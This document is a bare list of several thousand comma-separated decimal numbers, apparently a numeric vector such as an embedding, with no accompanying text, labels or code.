0.03502582386136055, 0.0023580663837492466, -0.009672068990767002, -0.05790161341428757, 0.014155665412545204, -0.0030538595747202635, 0.053076475858688354, 0.005936949979513884, -0.02694517746567726, -0.021204430609941483, -0.013821394182741642, -0.016466498374938965, 0.011219890788197517, 0.03005535528063774, 0.036188505589962006, -0.04203099012374878, -0.03656638041138649, 0.007343069650232792, -0.0004033056611660868, -0.04235072806477547, 0.025579025968909264, -0.019344137981534004, 0.01838492415845394, 0.0011535994708538055, 0.01584155485033989, -0.001634114538319409, 0.0037932530976831913, 0.041885655373334885, -0.03793253004550934, -0.023805933073163033, -0.014591671526432037, -0.004094824194908142, 0.02537555620074272, -0.02178577147424221, 0.012673243880271912, 0.0015305631095543504, 0.0009024417959153652, -0.0017531078774482012, 0.039037082344293594, 0.03209004923701286, -0.04304833710193634, -0.005442809779196978, -0.04714679345488548, -0.0017440244555473328, 0.0013025682419538498, 0.0055663445964455605, 0.022207245230674744, -0.001905710087157786, -0.005308374296873808, -0.014686139300465584, -0.0008883624686859548, -0.0052139065228402615, -0.021146295592188835, 0.008843657560646534, -0.02931414358317852, -0.04176938533782959, 0.035897836089134216, 0.01866106130182743, -0.006169486325234175, 0.005402842536568642, 0.011772165074944496, 0.011503294110298157, 0.032293520867824554, 0.003611583961173892, 0.010849284939467907, -0.031247105449438095, -0.04278673231601715, 0.012934847734868526, -0.0006898888386785984, -0.027148647233843803, 0.004796067252755165, -0.0049668364226818085, 0.0006721760728396475, 0.008916324935853481, -0.04130431264638901, 0.02932867780327797, 0.027308516204357147, 0.00511217163875699, -0.03278765827417374, -0.033892206847667694, 0.05810508131980896, -0.017992518842220306, -0.022643251344561577, 0.00044236454414203763, -0.04560624063014984, 0.00623125396668911, -0.0016668150201439857, -0.0233117938041687, -0.03005535528063774, 0.0036570013035088778, -0.008167847990989685, 0.03063669614493847, 0.013080183416604996, -0.015143945813179016, -0.01127802487462759, -0.03084016591310501, 0.029459480196237564, 0.018021585419774055, -0.02306472323834896, 0.012128236703574657, 0.0016849819803610444, -0.01584155485033989, -0.014737006276845932, -0.03197378292679787, 0.023791400715708733, 0.0006117710727266967, 0.039531219750642776, -0.03322366625070572, -0.015332881361246109, -0.017164107412099838, 0.04429822042584419, 0.0030683930963277817, -0.0003572070854716003, 0.021887507289648056, 0.05011163651943207, -0.0246343445032835, 0.022628717124462128, -0.012011968530714512, 0.019780144095420837, -0.022628717124462128, 0.025288354605436325, 0.019678408280014992, 0.025549957528710365, -0.017803583294153214, -0.005272040609270334, 0.010674882680177689, -0.0011763081420212984, -0.017323976382613182, -0.00493413582444191, -0.01268777810037136, 0.018108787015080452, -0.00974473636597395, -0.005726213566958904, 0.002910340903326869, -0.013726925477385521, 0.001843034173361957, -0.010711216367781162, -0.0311599038541317, -0.027584653347730637, 0.009236062876880169, 0.03961842134594917, -0.0518556609749794, 0.0024198340252041817, 0.003960388712584972, 0.0022417979780584574, 0.002408933825790882, -0.029488546773791313, -0.009374131448566914, -0.0011690413812175393, -0.01390132773667574, 0.003402664326131344, -0.00363156758248806, -0.014540803618729115, 0.038223203271627426, -0.030723897740244865, -0.015260213986039162, 0.021989241242408752, -0.008625654503703117, -0.024721546098589897, 0.005926049780100584, -0.001139974338002503, 0.022396180778741837, -0.036450110375881195, -0.0016268477775156498, 0.0019783778116106987, -0.009548533707857132, -0.0059769172221422195, 0.0030284258536994457, -0.007346703205257654, -0.008291383273899555, 0.018472125753760338, 0.046565454453229904, -0.025230219587683678, 0.028907205909490585, 0.016277560964226723, 0.0025869696401059628, -0.011895700357854366, -0.03427008166909218, 0.024779681116342545, 0.006521924864500761, 0.018065186217427254, -0.00481060054153204, 0.03145057335495949, -0.0363338440656662, 0.026538237929344177, 0.03287485986948013, -0.00660912599414587, -0.017512911930680275, -0.0075211054645478725, -0.0021891139913350344, 0.0168589036911726, -0.020928293466567993, 0.02852933295071125, 0.002543369075283408, -0.062087271362543106, -0.027032379060983658, -0.015565418638288975, -0.00999180693179369, 0.04825134202837944, -0.02438727580010891, -0.04194378852844238, -0.013683324679732323, -0.002247248077765107, -0.014351868070662022, -0.002830406418070197, 0.018312256783246994, -0.011343426071107388, -0.0022563317324966192, 0.03656638041138649, 0.004581697750836611, 0.01414839830249548, -0.004636198282241821, -0.033078331500291824, -0.00771730812266469, 0.03031695820391178, -0.014620738103985786, -0.0030320591758936644, -0.012397106736898422, -0.014439068734645844, 0.004828767850995064, 0.0084076514467597, 0.018297722563147545, 0.013676058501005173, -0.0002463888667989522, -0.00010718483827076852, 0.012949381954967976, 0.01557995192706585, -0.00584248173981905, -0.004360061138868332, 0.03191564604640007, 0.07069112360477448, -0.006994264665991068, -0.00790624413639307, -0.04871641471982002, -0.013261852785944939, -0.01738210953772068, -0.02175670489668846, 0.030491361394524574, -0.03921148180961609, -0.03136337175965309, 0.004963202867656946, -0.0014896875945851207, 0.026654506102204323, -0.026596372947096825, -0.009541267529129982, 0.0009864638559520245, 0.005853381939232349, -0.013799593783915043, -0.01065308228135109, -0.0168298352509737, 0.005439176224172115, -0.008582053706049919, 0.02020161598920822, -0.00695066386833787, 0.014606204815208912, 0.008327716961503029, 0.025288354605436325, 0.011546894907951355, -0.002556085819378495, -0.019082535058259964, 0.01736757718026638, 0.010042673908174038, 0.012891246937215328, 0.010558614507317543, 0.027875324711203575, 0.05293114110827446, 0.016771702095866203, 0.012927581556141376, 0.0012807679595425725, 0.04223445802927017, -0.01127802487462759, -0.019533073529601097, 0.00278862239792943, -0.024430876597762108, -0.013232785277068615, -0.022439781576395035, -0.0181378535926342, 0.014039397239685059, 0.017527446150779724, 0.008996259421110153, 0.0061876531690359116, 0.02046322077512741, 0.019765609875321388, -0.014882341958582401, 0.01895173266530037, -0.0220037754625082, 0.02460527792572975, 0.002774088876321912, -0.0415949821472168, 0.013283653184771538, 0.01815238781273365, -0.0056281122379004955, -0.0024034837260842323, 0.0011899333912879229, -0.02929961122572422, -0.03220631927251816, -0.035374630242586136, 0.010137141682207584, -0.024532610550522804, 0.013523456640541553, 0.02229444496333599, 0.006180386524647474, 0.008770989254117012, -0.03714771941304207, -0.012862180359661579, 0.0006808053585700691, 0.0034480816684663296, -0.04726306349039078, 0.026291169226169586, 0.004120257683098316, -0.016204893589019775, -0.030927367508411407, 0.0027377549558877945, -0.009817404672503471, -0.0026905210688710213, -0.000887908274307847, -0.023776866495609283, 0.01362519059330225, -0.025491824373602867, -0.010202542878687382, -0.0067835282534360886, -0.03479328751564026, 0.010544081218540668, -0.007310369051992893, 0.01918426901102066, 0.023413527756929398, 0.0026596372481435537, -0.019373204559087753, 0.0032736791763454676, 0.02935774438083172, -0.00550094386562705, 0.005210272967815399, 0.006630926392972469, 0.010478680022060871, 0.013210984878242016, -0.0021963808685541153, 0.006732660811394453, 0.02434367500245571, -0.010965554043650627, 0.017963452264666557, -0.0024107503704726696, 0.009919138625264168, 0.0026650873478502035, 0.0076664406806230545, -0.012506108731031418, -0.04851294681429863, 0.001030064420774579, -0.005718946922570467, -0.022090977057814598, -0.013465321622788906, 0.004040323197841644, 0.012520642019808292, 0.00022356667614076287, -0.018544793128967285, 0.017294909805059433, -0.0007543814135715365, 0.014424535445868969, 0.02127709798514843, -0.007026965264230967, 0.015347415581345558, -0.011924766935408115, 0.017789049074053764, -0.015986891463398933, -0.030752964317798615, -0.06295928359031677, 0.021611370146274567, 0.003055676119402051, -0.013777793385088444, -0.03717678785324097, -0.011445160023868084, 0.011888433247804642, -0.018762797117233276, -0.010791150853037834, 0.03546183183789253, 0.0065146577544510365, -0.030229756608605385, 0.017541978508234024, 0.008320449851453304, -0.015754353255033493, -0.007375770248472691, 0.0005613578832708299, -0.011089088395237923, 0.017730915918946266, 0.005798881407827139, -0.004752466455101967, -0.007746375165879726, -0.010660349391400814, 0.02021615020930767, -0.010863819159567356, 0.0070705655962228775, -0.007891710847616196, 0.010326078161597252, 0.030026286840438843, -0.003302746219560504, 0.02259965054690838, 0.010384212248027325, -0.02411113865673542, 0.010347878560423851, 0.013487122021615505, 0.02383500151336193, 0.0015169379767030478, 0.021872973069548607, 0.013726925477385521, -0.036682646721601486, -0.01349438913166523, -0.008167847990989685, -0.007724574767053127, -0.023021122440695763, 0.04037416726350784, -0.006027784664183855, 0.037002384662628174, -0.00583158154040575, 0.04778626933693886, -0.014170198701322079, 0.0051376051269471645, -0.0007670982740819454, 0.005195739679038525, -0.012302638962864876, -0.003268229076638818, -0.010449613444507122, 0.009766536764800549, -0.021989241242408752, -0.043455276638269424, 0.013290919363498688, 0.021887507289648056, -0.02804972603917122, 0.0011999252019450068, -0.018355857580900192, -0.025230219587683678, -0.00045508137554861605, 0.009984539821743965, -0.012869447469711304, -0.020608555525541306, 0.027061445638537407, -0.008073380216956139, 0.0032064616680145264, -0.034880489110946655, 0.03063669614493847, -0.015463683754205704, -0.019024400040507317, -0.050983648747205734, 0.002425283892080188, -0.0037096852902323008, -0.017018772661685944, -0.0005527285975404084, 0.03970562294125557, 0.0181378535926342, 0.019344137981534004, 0.019823744893074036, -0.01074755098670721, 0.00481060054153204, 0.016510097309947014, 0.006376589182764292, -0.0036079506389796734, 0.024009402841329575, -0.017774516716599464, -0.020957360044121742, 0.028994405642151833, -0.025055818259716034, 0.01610315963625908, -0.03816507011651993, 0.00871285516768694, -0.01863199472427368, 0.002000177977606654, -0.007695507723838091, -0.02384953387081623, -0.02360246330499649, -0.003557083196938038, 0.024794213473796844, -0.011052754707634449, 0.0067181275226175785, -0.02098642662167549, 0.005998717620968819, -0.010718483477830887, -0.02355886436998844, -0.020041747018694878, -0.045751575380563736, 0.01414839830249548, -0.007448437623679638, 0.02180030569434166, 0.035403694957494736, -0.019329603761434555, 0.03316553309559822, 0.03351433575153351, 0.0031138102058321238, -0.026610907167196274, -0.029154274612665176, -0.006060484796762466, -0.006038684863597155, -0.0415949821472168, 0.0026650873478502035, 0.007350336294621229, 0.05284393951296806, 0.0029194243252277374, 0.0135961240157485, -0.03819413483142853, 0.006917963735759258, -0.010544081218540668, -0.01231717225164175, -0.023398995399475098, -0.02149510197341442, -0.011067287996411324, 0.023486195132136345, -0.00013557064812630415, -0.0036969685461372137, 0.00870558898895979, -0.02097189426422119, -0.006910697091370821, 0.011735831387341022, -0.008349517360329628, -0.006794428452849388, -0.01103095430880785, -0.03755465894937515, -0.013312719762325287, 0.01130709145218134, 0.01760011352598667, -0.03284579515457153, 0.0010927403345704079, 0.011321625672280788, 0.02049228735268116, -0.0363338440656662, -0.0060205175541341305, 0.0027105046901851892, -0.03735119104385376, -0.005951483268290758, -0.006336621940135956, -0.0002434367488604039, -0.03220631927251816, 0.02049228735268116, -0.016146760433912277, 0.009112527593970299, -0.020899226889014244, 0.021349765360355377, 0.003993089310824871, 0.015376482158899307, -0.003949488513171673, -0.007146866992115974, 0.007401203736662865, 0.006739927921444178, -0.030985500663518906, 0.013574323616921902, -0.022774051874876022, -0.024009402841329575, -0.003931321669369936, 0.022992055863142014, 0.028180528432130814, 0.024837814271450043, -0.02361699752509594, 0.05397755652666092, 0.02360246330499649, -0.02953214757144451, -0.007175934035331011, 0.004563530441373587, 0.0023398995399475098, -0.012796779163181782, 0.029125208035111427, -0.007782709319144487, 0.005086738150566816, -0.013399921357631683, 0.013319986872375011, 0.029401345178484917, -0.0032536955550312996, -0.0035552664194256067, 0.01130709145218134, -0.006234887521713972, 0.012033768929541111, -0.026262100785970688, -0.010347878560423851, 0.04322274029254913, 0.002047412097454071, -0.0017158656846731901, -0.019402271136641502, -0.01975107751786709, -0.03496769070625305, 0.011234424076974392, 0.03086923249065876, -0.001239892328158021, -0.013516189530491829, -0.0045780641958117485, 0.013959462754428387, 0.011241691187024117, 0.0003553903952706605, -0.023268193006515503, -0.03871734440326691, -0.024300074204802513, 0.04258326441049576, -0.0022290812339633703, 0.020158015191555023, 0.015652619302272797, -0.025302888825535774, 0.02491048164665699, 0.03351433575153351, 0.018995333462953568, -0.02616036683320999, -0.018472125753760338, -0.027163181453943253, -0.0014851457672193646, -0.007437537424266338, 0.012905781157314777, -0.028849070891737938, 0.0014606204349547625, 0.027817189693450928, 0.0038949879817664623, 0.021843906491994858, -0.023500729352235794, -0.00025479108444415033, 0.022149110212922096, -0.005068570841103792, -0.01890813186764717, 0.011343426071107388, -0.006812595296651125, -0.03767092898488045, 0.014366401359438896, 0.05627385526895523, 0.011336158961057663, -0.010965554043650627, -0.0017540162662044168, -0.010166209191083908, 0.0009401381830684841, 0.013007516041398048, 0.01377052627503872, 0.008756455965340137, -0.013734192587435246, 0.01117628999054432, -0.019373204559087753, 0.037234921008348465, -0.020841091871261597, 0.014359134249389172, -0.016946103423833847, 0.007324902806431055, -0.037438392639160156, 0.010485947132110596, 0.024692479521036148, -0.010188009589910507, -0.022410714998841286, 0.0010682150023058057, -0.02255604974925518, -0.008211448788642883, -0.005471876822412014, 0.005497310310602188, -0.003840487217530608, -0.009570334106683731, 0.016669966280460358, 0.004378227982670069, 0.020855626091361046, -0.010478680022060871, -0.0009006251348182559, 0.019271470606327057, -0.019765609875321388, -0.005660812836140394, -0.01610315963625908, 0.00134707719553262, -0.01866106130182743, 0.0035607165191322565, -0.020332418382167816, -0.024009402841329575, 0.012288105674088001, -0.02982281893491745, -0.015986891463398933, -0.00288309040479362, -0.028209595009684563, 0.002915790770202875, -0.02412567101418972, -0.014722472988069057, -0.022759519517421722, -0.03319459781050682, 0.0004564439004752785, -0.0042910268530249596, -0.006710860878229141, 0.014867808669805527, 0.08603853732347488, -0.011517828330397606, 0.017948918044567108, -0.0068198624067008495, -0.01838492415845394, 0.007571972906589508, 0.014809674583375454, -0.023544330149888992, 0.020361484959721565, -0.014555336907505989, 0.013654258102178574, 0.036450110375881195, -0.0013906778767704964, 0.019910946488380432, 0.010907419957220554, 0.01996907964348793, -0.03185751289129257, -0.016989704221487045, 0.01741117797791958, -0.004621664993464947, 0.010994620621204376, 0.012426174245774746, -0.007146866992115974, -0.005599045194685459, 0.020070815458893776, -0.000578616454731673, -0.0035062157548964024, -0.022381646558642387, -0.05348341539502144, 0.010805685073137283, 0.022962989285588264, 0.001107273856177926, -0.01191023364663124, -0.008618387393653393, -0.0057334802113473415, 0.009257863275706768, 0.02044868655502796, 0.03717678785324097, -0.018602928146719933, -0.014562604017555714, -0.012164570391178131, -0.01815238781273365, -0.012724111787974834, 0.0027395717334002256, -0.016233960166573524, -0.020928293466567993, -0.0031192603055387735, -0.01999814622104168, -0.02751198597252369, 0.006594592239707708, -0.009250596165657043, -0.007688241079449654, -0.004232892766594887, 0.012804046273231506, 0.021320698782801628, 0.00003735573045560159, -0.02305018901824951, -0.004483595956116915, -0.020128948614001274, -0.02623303420841694, -0.002734121633693576, 0.001364335766993463, -0.007615573238581419, -0.004530830308794975, -0.01841399073600769, -0.011764897964894772, -0.03418288007378578, 0.00163593131583184, -0.01975107751786709, 0.019518541172146797, 0.003949488513171673, -0.0005967833567410707, 0.008320449851453304, 0.003444448346272111, -0.015245680697262287, -0.0194749403744936, 0.002348982961848378, 0.010783884674310684, -0.005195739679038525, 0.0016949737910181284, -0.016510097309947014, 0.01741117797791958, -0.012004701420664787, 0.026407437399029732, -0.0002743205113802105, 0.032293520867824554, -0.028136927634477615, 0.002332632662728429, -0.002127346582710743, 0.00434552738443017, -0.030026286840438843, 0.0041892919689416885, 0.013886794447898865, 0.01786171644926071, 0.008618387393653393, 0.022962989285588264, 0.01712050661444664, -0.024547144770622253, -0.029692016541957855, -0.018050653859972954, 0.00268870429135859, 0.005802514497190714, 0.0006808053585700691, -0.006474690977483988, -0.016204893589019775, -0.008364050649106503, -0.0015269297873601317, -0.00856025330722332, -0.007608306594192982, 0.006830762606114149, -0.02697424404323101, 0.023151924833655357, 0.005497310310602188, -0.01208463590592146, -0.006314822006970644, 0.015245680697262287, -0.00551184406504035, -0.018050653859972954, -0.013879528269171715, -0.02694517746567726, -0.015231146477162838, -0.0047851670533418655, 0.023151924833655357, -0.03505489230155945, 0.02409660443663597, 0.004727032966911793, 0.017483845353126526, -0.03223538398742676, 0.024183806031942368, 0.0007934402674436569, 0.004581697750836611, -0.0009106169454753399, 0.01611769199371338, -0.01077661756426096, 0.012854913249611855, -0.012578776106238365, 0.015550884418189526, 0.024765146896243095, 0.0005286574014462531, 0.009788337163627148, -0.0037932530976831913, 0.021393366158008575, -0.003931321669369936, -0.010965554043650627, 0.004806967452168465, -0.0009355964721180499, -0.005359241738915443, -0.0015541801694780588, 0.012288105674088001, 0.01659729890525341, 0.014511737041175365, -0.034880489110946655, 0.017469311133027077, 0.017963452264666557, 0.008974459022283554, -0.019373204559087753, 0.0014224699698388577, -0.003718768712133169, -0.003549816319718957, 0.016277560964226723, 0.007484771776944399, -0.00792804453521967, 0.0207393579185009, -0.0036352009046822786, -0.015594485215842724, 0.018806396052241325, -0.0016368395881727338, -0.02929961122572422, -0.017164107412099838, 0.009301464073359966, 0.023471662774682045, 0.002921240869909525, -0.01528928056359291, -0.0007875360315665603, 0.005006803665310144, 0.020535888150334358, 0.024271007627248764, -0.0002949853951577097, 0.019024400040507317, -0.0038150534965097904, -0.0103987455368042, 0.0012789512984454632, 0.01400306262075901, 0.008007979020476341, -0.011038221418857574, -0.023471662774682045, -0.019009865820407867, -0.011328891851007938, -0.052291665226221085, 0.018762797117233276, 0.01662636548280716, 0.03319459781050682, -0.005646279081702232, -0.010020873509347439, 0.010682149790227413, -0.03299112990498543, 0.00401488970965147, -0.018283190205693245, 0.003471698611974716, -0.00790624413639307, -0.01924240216612816, -0.014053930528461933, -0.008000711910426617, -0.0030193424317985773, 0.009112527593970299, -0.026901576668024063, -0.0015269297873601317, 0.003873187582939863, -0.0004385040665511042, 0.008044312708079815, -0.009148861281573772, 0.004334627650678158, -0.010987354442477226, 0.0037024186458438635, 0.03865920752286911, 0.006765361409634352, -0.01543461624532938, -0.01996907964348793, -0.00440366193652153, -0.00896719191223383, 0.013428987935185432, -0.005882448982447386, -0.004752466455101967, 0.0055663445964455605, -0.011721297167241573, 0.008763723075389862, 0.02052135393023491, -0.009185194969177246, -0.008596586994826794, 0.006714493967592716, -0.03871734440326691, -0.01582702249288559, -0.010035407729446888, 0.0030284258536994457, -0.014729740098118782, -0.0004968653083778918, 0.002961208112537861, -0.0064964909106493, -0.00802977941930294, 0.007412103936076164, 0.02829679660499096, -0.015013143420219421, -0.01764371432363987, -0.022933920845389366, 0.019344137981534004, -0.0002265187940793112, 0.017018772661685944, 0.003035692498087883, -0.010703950189054012, 0.014170198701322079, -0.003953122068196535, -0.006249420810490847, 0.001521479687653482, -0.009177928790450096, -0.010638548992574215, 0.00492323562502861, 0.0033081963192671537, -0.018515726551413536, -0.010028140619397163, -0.010674882680177689, 0.04025789722800255, -0.03159590810537338, -0.009563066996634007, 0.02259965054690838, -0.03685704991221428, 0.025259288027882576, -0.021974708884954453, -0.014228332787752151, -0.015391015447676182, 0.0207974910736084, 0.009563066996634007, 0.0063656894490122795, 0.003934955224394798, 0.005359241738915443, -0.025070350617170334, -0.006118618883192539, -0.009294196963310242, -0.005871548783034086, 0.0034081144258379936, -0.004182025324553251, 0.004974103067070246, 0.045024897903203964, 0.015681685879826546, -0.016437429934740067, -0.012004701420664787, -0.007441170979291201, -0.048106007277965546, -0.01639382913708687, -0.011096355505287647, -0.01142336055636406, 0.00719773443415761, -0.005010436754673719, 0.01608862541615963, -0.0194313395768404, 0.0207538902759552, -0.0006040501175448298, -0.00551184406504035, 0.02879093773663044, 0.00972293596714735, 0.008829123340547085, 0.017512911930680275, 0.04720492660999298, 0.0052793072536587715, 0.010936486534774303, -0.02643650397658348, -0.01735304296016693, -0.03171217814087868, 0.0006367505993694067, 0.016495564952492714, 0.01271684467792511, -0.03400847688317299, -0.001264417776837945, -0.04249606281518936, -0.0038550207391381264, 0.0207829587161541, -0.025026751682162285, -0.02126256562769413, 0.020855626091361046, -0.022207245230674744, 0.0016268477775156498, 0.00906166061758995, -0.031276170164346695, -0.018501192331314087, -0.0002284490328747779, -0.0023235492408275604, 0.00019926841196138412, -0.006075018551200628, -0.001561446930281818, -0.006013250909745693, -0.0071723004803061485, 0.020041747018694878, -0.0013052932918071747, 0.02979375049471855, 0.011815765872597694, -0.024023937061429024, -0.0004714316164609045, 0.010362411849200726, -0.006994264665991068, -0.0009401381830684841, 0.011692230589687824, -0.03188658133149147, 0.023689664900302887, -0.002272681798785925, -0.004948669578880072, 0.013072916306555271, 0.010682149790227413, 0.0029939087107777596, 0.009018059819936752, -0.0021091795060783625, -0.007244968321174383, -0.018733728677034378, -0.003598867217078805, 0.02020161598920822, 0.01922786980867386, 0.022759519517421722, 0.019256936386227608, 0.01180849876254797, 0.0025688025634735823, 0.025753427296876907, -0.01787625066936016, -0.009403198026120663, -0.010551348328590393, -0.01298571564257145, 0.011110888794064522, 0.0020183450542390347, -0.03113083727657795, -0.003764186054468155, 0.008087913505733013, 0.02675624191761017, 0.00856025330722332, 0.01916973479092121, -0.018806396052241325, 0.018806396052241325, -0.01143062673509121, -0.00999180693179369, 0.00023821376089472324, 0.03034602478146553, -0.0363629087805748, -0.03086923249065876, 0.026814375072717667, -0.01022434327751398, -0.005519110709428787, 0.010238876566290855, -0.02101549506187439, 0.00186574284452945, 0.009250596165657043, -0.01637929677963257, -0.008567520417273045, -0.03162497654557228, -0.009955473244190216, 0.012193637900054455, 0.030549494549632072, 0.0018339507514610887, 0.023268193006515503, 0.019605740904808044, -0.0019783778116106987, -0.00596601702272892, 0.0037932530976831913, -0.001618672744370997, -0.005242973566055298, -0.009039860218763351, -0.01258604321628809, -0.0006204003584571183, 0.01347258873283863, 0.008385851047933102, 0.016408363357186317, -0.009497666731476784, -0.024721546098589897, 0.0415368489921093, -0.020579488947987556, 0.012135503813624382, 0.0068634627386927605, -0.03005535528063774, -0.00908346101641655, -0.02227991260588169, -0.014911409467458725, -0.01611769199371338, 0.034095678478479385, 0.026930643245577812, -0.026407437399029732, 0.002870373660698533, -0.01530381478369236, -0.014809674583375454, -0.036159440875053406, -0.004995903465896845, 0.0010754817631095648, -0.021989241242408752, -0.008087913505733013, -0.006024151109158993, 0.01841399073600769, -0.02018708363175392, -0.010144408792257309, -0.0058352150954306126, -0.012767712585628033, 0.011706763878464699, -0.004854201339185238, -0.0006917054997757077, -0.013588856905698776, -0.016219427809119225, 0.00986827164888382, 0.008247782476246357, -0.014439068734645844, 0.02259965054690838, -0.00803704559803009, -0.0019511273130774498, 0.017193173989653587, -0.014700672589242458, 0.0072522349655628204, -0.012927581556141376, -0.0012317172950133681, 0.0440075509250164, 0.005737113766372204, 0.020608555525541306, 0.020346952602267265, 0.010449613444507122, -0.008087913505733013, -0.001224450534209609, 0.0026650873478502035, 0.01362519059330225, -0.00933779776096344, 0.024707013741135597, -0.023791400715708733, 0.011539628729224205, 0.0009346880833618343, 0.017759982496500015, 0.008741922676563263, 0.007608306594192982, -0.001681348541751504, -0.019315071403980255, 0.008574786596000195, -0.00402578990906477, -0.009831937961280346, 0.005308374296873808, -0.005969650112092495, 0.002766821999102831, 0.009831937961280346, -0.013465321622788906, -0.013319986872375011, 0.005475509911775589, 0.007234068121761084, 0.01656823232769966, 0.028209595009684563, -0.0040875570848584175, -0.008334983140230179, -0.0017022405518218875, -0.00016123142268043011, -0.00931599736213684, -0.0036897016689181328, 0.0015977807343006134, -0.015173012390732765, -0.006896163336932659, -0.02307925745844841, -0.01143062673509121, 0.0025887861847877502, 0.020361484959721565, 0.00841491762548685, 0.016931571066379547, 0.010805685073137283, 0.01712050661444664, 0.0025942362844944, -0.008829123340547085, -0.009643001481890678, -0.004599864594638348, -0.020637622103095055, -0.008850923739373684, -0.01870466209948063, -0.018791863694787025, 0.02934321202337742, 0.019649341702461243, -0.0168153028935194, 0.009047126397490501, -0.010544081218540668, -0.002576069440692663, 0.0019456773297861218, 0.002921240869909525, 0.009911872446537018, 0.002841306384652853, 0.004116624593734741, -0.01867559552192688, -0.011525094509124756, -0.004450895823538303, -0.007826309651136398, 0.011924766935408115, -0.015710754320025444, -0.020128948614001274, 0.009257863275706768, 0.015492750331759453, -0.016219427809119225, -0.007128700148314238, -0.012891246937215328, -0.011699497699737549, 0.009541267529129982, -0.005250240210443735, -0.007125066593289375, -0.002441634191200137, 0.005853381939232349, 0.03659544512629509, -0.014519003219902515, 0.009388664737343788, -0.010057207196950912, -0.0009764720452949405, -0.012607843615114689, 0.003050226019695401, 0.024823281913995743, -0.0076010399498045444, -0.01869012787938118, 0.004632564727216959, -0.011626829393208027, -0.012244504876434803, 0.0017594663659110665, 0.007724574767053127, -0.007303102407604456, -0.007644640281796455, -0.0011245324276387691, 0.0036679015029221773, -0.016800768673419952, -0.0006871637888252735, -0.005675346124917269, -0.004429095424711704, 0.003346347017213702, -0.005210272967815399, 0.023951269686222076, 0.030404159799218178, 0.00870558898895979, 0.005573611240833998, 0.013356320559978485, -0.002581519540399313, -0.0084294518455863, 0.0022708652541041374, -0.005268407054245472, 0.009650268591940403, -0.02182937227189541, -0.008400384336709976, 0.014569871127605438, 0.015754353255033493, -0.004945036023855209, 0.01941680535674095, -0.009286929853260517, -0.014562604017555714, 0.006358422338962555, 0.003617034060880542, 0.0038949879817664623, -0.018849996849894524, -0.011103622615337372, -0.015550884418189526, -0.01658276654779911, 0.008792789652943611, -0.0031628611031919718, -0.020913759246468544, -0.008720122277736664, 0.006689060479402542, 0.004396394826471806, -0.030258825048804283, 0.016917036846280098, -0.004298293497413397, 0.003818686818704009, -0.03005535528063774, -0.00771730812266469, -0.0017621914157643914, 0.022628717124462128, 0.01218637079000473, 0.002314465818926692, 0.012295372784137726, 0.0019020766485482454, -0.005206639878451824, -0.014998610131442547, 0.004320093896239996, -0.01866106130182743, -0.002352616284042597, -0.012578776106238365, -0.0043745944276452065, -0.009650268591940403, 0.005940583068877459, -0.002348982961848378, -0.005973283667117357, -0.006881629582494497, -0.012120969593524933, 0.007949844934046268, -0.012760445475578308, -0.03156684339046478, 0.0050722043961286545, -0.00240530027076602, -0.016742635518312454, -0.0038877211045473814, 0.016277560964226723, -0.003268229076638818, -0.0006776261725462973, 0.002214547712355852, -0.004756100010126829, 0.020841091871261597, 0.008066113106906414, -0.011292558163404465, 0.00024116587883327156, -0.017585579305887222, -0.005715313367545605, 0.02751198597252369, -0.021117229014635086, 0.002198197413235903, -0.020841091871261597, -0.01165589690208435, -0.0031537774484604597, -0.0027377549558877945, -0.019068000838160515, -0.016524631530046463, -0.017571046948432922, -0.0026105865836143494, 0.006423823535442352, -0.007840842939913273, -0.0008402201347053051, 0.02674170769751072, -0.0039167883805930614, 0.0026378370821475983, -0.026552772149443626, -0.013334520161151886, -0.01259330939501524, -0.017963452264666557, -0.009483132511377335, 0.01167769730091095, 0.0044763293117284775, 0.011757631786167622, 0.013181918300688267, 0.027046913281083107, -0.021698569878935814, 0.0018375840736553073, -0.00005373434760258533, -0.032584190368652344, -0.02281765267252922, 0.005399208981543779, -0.013937662355601788, 0.006013250909745693, 0.0034081144258379936, 0.006060484796762466, -0.02514301985502243, -0.0052393400110304356, -0.006986998021602631, -0.012971181422472, 0.00010485720122233033, 0.012513375841081142, 0.0033081963192671537, 0.004730666521936655, -0.006587325595319271, 0.006729027722030878, -0.018617460504174232, -0.001404303009621799, -0.01167769730091095, 0.0007643732242286205, -0.006634559482336044, 0.009526733309030533, -0.000017925642168847844, -0.004836034495383501, 0.011147222481667995, 0.023704199120402336, 0.021059095859527588, -0.017469311133027077, -0.003673351602628827, -0.03958935663104057, -0.00790624413639307, 0.008494852110743523, -0.008022512309253216, 0.02493955008685589, 0.005144872236996889, 0.0026269368827342987, 0.007564706262201071, -0.0007053306908346713, -0.01530381478369236, 0.001394311198964715, -0.0097156697884202, 0.0002940770355053246, 0.011234424076974392, -0.0013389020459726453, 0.013392654247581959, 0.009962739422917366, 0.004396394826471806, 0.018820930272340775, -0.013392654247581959, 0.014119330793619156, -0.006383856292814016, 0.010551348328590393, 0.03086923249065876, 0.008276849053800106, -0.021611370146274567, -0.004756100010126829, -0.0019166101701557636, -0.017018772661685944, 0.01140156015753746, 0.013777793385088444, 0.023428061977028847, -0.011496027931571007, -0.02358793094754219, -0.012200904078781605, 0.019271470606327057, 0.005580878350883722, 0.018094252794981003, -0.011038221418857574, -0.000023347332898993045, 0.0012553342385217547, 0.0029920919332653284, -0.0362757071852684, -0.013864994049072266, -0.02874733693897724, 0.022178176790475845, 0.00019029849499929696, -0.007920777425169945, -0.021059095859527588, 0.0019474939908832312, 0.006834395695477724, 0.011590495705604553, 0.010943753644824028, 0.000037384117604233325, 0.005940583068877459, -0.008974459022283554, 0.023907668888568878, -0.0168734360486269, -0.025491824373602867, 0.02355886436998844, -0.016481030732393265, 0.004439995624125004, 0.013007516041398048, -0.0028849071823060513, -0.008204181678593159, 0.005635378882288933, 0.019082535058259964, 0.020041747018694878, 0.025549957528710365, 0.0194894727319479, 0.009446798823773861, -0.00466889888048172, -0.003978555556386709, -0.006507391110062599, -0.01467160601168871, -0.007470238022506237, 0.01438093464821577, 0.015347415581345558, -0.0007829943206161261, 0.011379759758710861, 0.013726925477385521, 0.00005586328188655898, -0.029154274612665176, 0.004040323197841644, -0.018864531069993973, -0.0018484842730686069, -0.007593773305416107, -0.021654970943927765, 0.010682149790227413, 0.04089737311005592, -0.0002968020853586495, -0.013574323616921902, 0.00473429961130023, -0.0004362332110758871, -0.013319986872375011, -0.013588856905698776, -0.01761464774608612, 0.009163395501673222, 0.0041275243274867535, -0.022512448951601982, -0.019518541172146797, 0.025026751682162285, -0.009817404672503471, -0.007026965264230967, 0.003909521270543337, -0.007310369051992893, -0.04461795836687088, -0.02097189426422119, -0.004389128182083368, 0.019562140107154846, 0.01065308228135109, 0.014162931591272354, 